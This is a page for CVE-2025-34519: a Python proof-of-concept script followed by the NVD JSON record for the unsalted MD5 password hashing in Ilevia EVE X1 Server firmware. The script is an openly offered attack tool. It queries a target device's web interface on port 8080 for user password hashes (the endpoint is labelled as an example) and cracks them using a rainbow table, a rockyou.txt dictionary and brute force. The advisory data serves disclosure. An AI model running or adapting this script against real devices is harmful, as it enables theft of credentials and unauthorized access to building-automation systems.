CVE-2025-34519

#!/usr/bin/env python3 # CVE-2025-34519 - Ilevia EVE X1 Server Insecure Hashing Algorithm PoC # This PoC demonstrates the offline cracking of unsalted MD5 password hashes # extracted from Ilevia EVE X1 Server firmware (<= 4.7.18.0.eden) import hashlib import requests import sys import itertools import string # Step 1: Extract password hashes from the exposed Ilevia EVE X1 Server # The hashes are typically stored in the device's configuration database # accessible via the web management interface on port 8080 TARGET_HOST = "http://<target-ip>:8080" HASH_ENDPOINT = "/api/users" # Example endpoint exposing user password hashes def fetch_password_hashes(target_url): """Fetch unsalted MD5 password hashes from the Ilevia EVE X1 Server.""" try: # Attempt to retrieve the user database containing MD5 hashes response = requests.get(f"{target_url}{HASH_ENDPOINT}", timeout=10) if response.status_code == 200: data = response.json() return {user['username']: user['password_hash'] for user in data.get('users', [])} except Exception as e: print(f"[ERROR] Failed to fetch hashes: {e}") return {} def md5_hash(password): """Compute MD5 hash (same algorithm used by vulnerable firmware).""" return hashlib.md5(password.encode('utf-8')).hexdigest() def dictionary_attack(hash_value, wordlist_path): """Perform dictionary attack against the unsalted MD5 hash.""" try: with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as f: for line in f: candidate = line.strip() if md5_hash(candidate) == hash_value: return candidate except FileNotFoundError: print(f"[WARNING] Wordlist not found: {wordlist_path}") return None def rainbow_table_attack(hash_value): """Lookup the hash in a precomputed rainbow table.""" # Common MD5 rainbow table lookup (using online services or local table) rainbow_table = { "5f4dcc3b5aa765d61d8327deb882cf99": "password", "e10adc3949ba59abbe56e057f20f883e": "123456", "d8578edf8458ce06fbc5bb76a58c5ca4": "qwerty", "827ccb0eea8a706c4c34a16891f84e7b": "12345", "25d55ad283aa400af464c76d713c07ad": "12345678", } return rainbow_table.get(hash_value) def brute_force_attack(hash_value, max_length=4): """Brute force attack for short passwords (demonstrates MD5 speed).""" chars = string.ascii_lowercase + string.digits for length in range(1, max_length + 1): for combo in itertools.product(chars, repeat=length): candidate = ''.join(combo) if md5_hash(candidate) == hash_value: return candidate return None def main(): print("=" * 60) print("CVE-2025-34519 PoC - Ilevia EVE X1 Server MD5 Hash Crack") print("=" * 60) target = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST # Step 1: Fetch the password hashes print(f"\n[*] Targeting: {target}") print("[*] Fetching password hashes...") hashes = fetch_password_hashes(target) if not hashes: # Demo with sample hash if target is unreachable print("[!] Could not reach target. Using demo hash.") hashes = {"admin": "5f4dcc3b5aa765d61d8327deb882cf99"} # Step 2: Crack each hash for username, hash_value in hashes.items(): print(f"\n[*] Cracking hash for user '{username}': {hash_value}") # Try rainbow table first (fastest) plaintext = rainbow_table_attack(hash_value) if plaintext: print(f"[+] Rainbow table match: {plaintext}") continue # Try dictionary attack plaintext = dictionary_attack(hash_value, "rockyou.txt") if plaintext: print(f"[+] Dictionary match: {plaintext}") continue # Brute force for short passwords plaintext = brute_force_attack(hash_value, max_length=4) if plaintext: print(f"[+] Brute force match: {plaintext}") else: print("[-] Password not cracked") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-34519", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:36.493", "lastModified": "2025-11-06T19:15:41.653", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain an insecure hashing algorithm vulnerability. The product stores passwords using the MD5 hash function without applying a per‑password salt. Because MD5 is a fast, unsalted hash, an attacker who obtains the password database can efficiently perform offline dictionary, rainbow‑table, or brute‑force attacks to recover the original passwords. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.18.0", "matchCriteriaId": "25D89BA5-1632-4243-BE68-D42803774A22"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "72B4F8B5-4641-4371-8759-3AB18EC87FB6"}]}]}], "references": [{"url": "https://www.ilevia.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ilevia-eve-x1-server-insecure-hashing-algorithm", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5964.php", "source": "[email protected]"}]}}